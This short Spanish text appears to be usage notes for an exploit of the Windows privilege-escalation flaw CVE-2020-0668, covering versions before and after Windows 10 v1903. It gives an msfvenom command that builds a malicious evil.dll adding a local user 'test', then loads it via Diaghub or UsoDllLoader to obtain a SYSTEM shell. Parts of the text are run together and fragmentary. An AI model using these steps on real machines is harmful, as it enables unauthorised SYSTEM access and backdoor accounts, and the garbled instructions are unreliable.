
Hacer que el exploit para CVE-2020-0668 funcione para versiones < win10 v1903 y versiones >= win10 v1903
Hacer que el exploit CVE-2020-0668 funcione para versiones < win10 v1903 y versiones >= win10 v1903
El exploit de powershell funciona en versiones < win10 v1903 con Diaghub.
evil.dll con msfvenom
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllexp.ps1 con powershellDiaghub.exe C:\ProgramData evil.dll para cargar el dll y añadir usuario.
El exploit de powershell funciona en versiones >= win10 v1903 con UsoDllLoader.
exp.ps1 con powershellUsoDllLoader.exe para obtener una shell del sistema
Una versión de lanzamiento x86 de SysTracingPoc para el issue, el exploit funciona en versiones >= win10 v1903 debido a UsoLoadDll.
Un PoC .NET. Si observas C:\Windows\System32\evil.dll y lo renombras como evil.txt.
Encontrarás que no es un archivo dll. Solo contiene registros de trazado.
Un PoC en powershell. También solo registros de trazado en evil.dll.